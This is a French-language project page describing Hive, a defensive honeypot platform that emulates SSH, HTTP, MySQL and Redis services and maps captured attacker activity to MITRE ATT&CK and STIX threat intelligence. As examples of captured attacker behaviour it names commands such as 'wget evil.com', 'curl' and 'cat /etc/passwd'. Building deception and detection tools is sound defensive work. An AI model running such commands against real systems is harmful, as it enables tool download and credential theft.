Performance & Architecture Highlights
4 Indicateurs Clés de Hive
Analyse Technique Approfondie
Architecture & Technical Deep-Dive
Hive repose sur trois piliers techniques distincts : un backend Go hautes performances, une couche d'émulation bas-niveau des protocoles réseau, et un pipeline automatisé de Cyber Threat Intelligence.
⚙️ Go Backend — Event Bus Lock-Free
Le cœur de Hive est un bus d'événements 100% asynchrone basé sur des goroutines et des channels Go natifs :
- Goroutines légères : chaque connexion attaquant est traitée dans une goroutine isolée (~2KB RAM), permettant de gérer des milliers de connexions simultanées sans dégradation.
- Lock-Free Channels : les événements réseau sont poussés dans des channels non-bloquants. Aucun mutex, aucun deadlock possible, même sous DoS ou brute-force intensif.
- Orchestrateur principal :
cmd/hive/démarre tous les listeners en parallèle et supervise le bus d'événements central.
~0% CPU overhead sur idle listeners
🔌 Émulation Bas-Niveau des Protocoles
Chaque honeypot émule le protocole cible avec une fidélité suffisante pour tromper les scanners automatisés et les attaquants humains :
- SSH PTY (
internal/sshd/) : Pseudo-Terminal interactif complet. L'attaquant croit opérer sur un vrai shell Linux. Chaque commande (wget,curl,cat /etc/passwd) est capturée. - HTTP (
internal/httpd/) : Simule WordPress (/wp-login.php,/wp-admin) et phpMyAdmin. Piège les scanners WPScan & Nikto. - MySQL (
internal/mysqld/) : Capture le handshake d'authentification — credentials inclus — sans jamais exposer de vraies données. - Redis RESP (
internal/redisd/) : Parser du protocole RESP complet pour détecter les tentativesCONFIG SETet exfiltrations.
🧠 Pipeline CTI — MITRE ATT&CK → STIX 2.1
Le pipeline de Cyber Threat Intelligence transforme chaque interaction brute en renseignement structuré exploitable :
- Moteur MITRE (
internal/mitre/) : Corrèle les commandes capturées aux identifiants ATT&CK. Ex:wget evil.com→ T1105 – Ingress Tool Transfer. - Processeur IOC (
internal/store/) :- Génère
threat-intel.stix.json(STIX 2.1) avec les Indicators of Compromise, les TTPs et les relations. - Écrit
iptables-blocklist.txtpour un blocage réseau immédiat.
- Génère
- API & WebSocket (
internal/api/) : Diffuse les événements en streaming vers le dashboard React 19 en moins de 10ms.
Schéma Interactif
Architecture & Data Flow
De l'attaquant au dashboard SOC — chaque octet est capturé, analysé et transformé en intelligence opérationnelle.
PTY interactif
WP & phpMyAdmin
Auth Capture
RESP Parser
TTP Correlation & Tagging
STIX 2.1 + iptables blocklists
Frontend — SOC Dashboard
React 19 Cyber Ops Dashboard
Le dashboard est une Single Page Application construite avec React 19 et TypeScript, conçue pour absorber des flux d'événements haute fréquence sans perte de frame.
React 19 Concurrent Mode
Utilise le Concurrent Rendering de React 19 pour ne jamais bloquer l'UI lors d'un pic d'événements réseau. Les flux WebSocket sont traités en background sans impacter l'interactivité.
Live Attack Feed & IOC Map
Visualisation en temps réel du flux d'attaques, cartographie géographique des IOCs, timeline des TTPs MITRE et console d'alertes avec criticité colorisée.
WebSocket Streaming <10ms
Connexion WebSocket persistante vers ws://localhost:8000. Chaque événement généré côté Go est poussé instantanément sans polling.
Simulation d'Attaque Guidée
Attack Walkthrough — Hive en Action
Scénario réel : un attaquant découvre Hive et commence son opération. Voici comment la plateforme capture, analyse et neutralise chaque étape.
/wp-login.php sur le port 8080. Le honeypot HTTP répond avec une fausse page WordPress qui enregistre toutes les requêtes.Clean Architecture
Structure du Projet
Hive suit les principes de la Clean Architecture Go côté backend et les bonnes pratiques d'une SPA React côté frontend : séparation stricte des responsabilités, testabilité et extensibilité.
Separation of Concerns (SoC)
Chaque package Go a une responsabilité unique : listeners, event bus, MITRE engine, store et API sont totalement découplés.
Event-Driven Design Pattern
Pas de couplage direct entre les honeypots et les processeurs. Tout communique via le bus d'événements central.
Extensible par Design
Ajouter un nouveau honeypot (FTP, SMTP, RDP) revient à créer un nouveau package internal/ftpd/ et l'enregistrer dans le bus.
Éthique & Utilisation Responsable — Avertissement Légal
Hive est un outil de recherche en sécurité défensive. Cette plateforme de cyber-déception est conçue exclusivement pour :
- Le déploiement sur vos propres infrastructures et réseaux avec autorisation explicite.
- La recherche académique et les environnements de laboratoire contrôlés.
- La collecte de renseignements sur les menaces (CTI) pour renforcer la posture de sécurité défensive.
- Les exercices de red team / blue team dans des cadres légaux définis.
Utiliser ce projet sur des systèmes sans autorisation explicite constitue une infraction pénale. L'auteur décline toute responsabilité pour tout usage illicite ou abusif de cette plateforme. Respectez toujours les lois locales en vigueur sur la cybersécurité et les systèmes informatiques.